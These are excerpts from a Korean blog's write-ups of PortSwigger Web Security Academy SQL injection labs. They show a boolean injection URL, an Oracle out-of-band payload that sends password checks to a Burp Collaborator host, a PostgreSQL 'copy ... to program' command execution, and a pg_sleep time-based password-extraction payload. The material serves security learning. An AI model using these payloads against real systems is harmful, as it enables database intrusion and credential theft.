Dork's port

음.. 이거 LOS 할때 했던건데.. 제일 처음 문제인데 왜 마지막에 있는 지는 모르겠지만, 카테고리 필터에 SQL injection을 해서 모든 결과를 얻어내면 되는 문제. [https://ac7a1f091f04c4ec807b233300ac0040.web-security-academy.net/filter?category=Accessories%27%20or%201=1--](https://ac7a1f091f04c4ec807b233300ac0040.web-security-academy.net/filter?category=Accessories' or 1=1--)

이 문제는 burp의 public server를 이용해서 풀어야하는 문제인데...burp suite의 community 버전에서는 사용이 안되고 pro 버전 이상에서 부터만 사용이 된다. 크랙 찾느라 한 2시간 삽질하다 그냥 free trial 사용하기로 결정.. 나중에 이런 형태의 injection을 하게 된다면 DNS server를 구축해서 써야겠다. 비밀번호를 얻어야하는데..이거 너무 불편한데...? 이걸로 자동화하기엔.. ' UNION SELECT CASE WHEN LENGTH(password) > 1 THEN UTL_INADDR.get_host_address('ki6wa1k0dp7sfjv4wbjv8rhc73d11q.burpcollaborator.net') ELSE NULL ..

out-of-band 를 발생시키면 되는 문제. 즉, 다른곳으로 패킷이 날라가게끔 하면된다. cheat-sheet에 따르면, Oracle은 이미 패치가 되었고 (그러나 아직 이전 버전의 사용자가 많다고 서술하고 있다), MySQL에서는 windows에서만 가능하다고 한다. 우선 이전에 쭉 PostgreSQL을 사용하였으므로 먼저 테스트해보려고 copy (SELECT '') to program 'nslookup burpcollaborator.net' 을 테스트 해보았다. 내가 구축한 DB에서는 정상적으로 동작하지 않았는데 그 이유는 DB를 구동하는 Docker에 nslookup이 없기때문인 것 같다. 그래서 이제 SQL Injection에 동작하는 query를 만들어야하는데 병..

Time delay를 이용해서 admin의 비밀번호를 찾는 문제 이전 문제와 마찬가지로 x' or PG_SLEEP(10) IS NULL-- 이 동작하므로 이 Query를 기본으로 exploit을 진행하도록 하자. 그리고, 온라인에서 테스트가 한계가 있어 테스트 데이터 베이스를 구축하여 실습을 진행하였다 (쿼리에 대한 더욱 빠른 디버깅이 가능) . 위에서 언급한 Base Query의 문제점이 있는데, or을 이용할 경우 FROM 을 이용하여 특정 table의 내용을 검색하지 못하는 문제가 있다 (다른 방법이 있을 수도 있지만, 우선 내 지식의 한계 + 검색 귀찮음). 따라서, UNION SELECT 를 사용해야 하며, postgresql의 경우 column의 수 뿐만 아니라 return value의..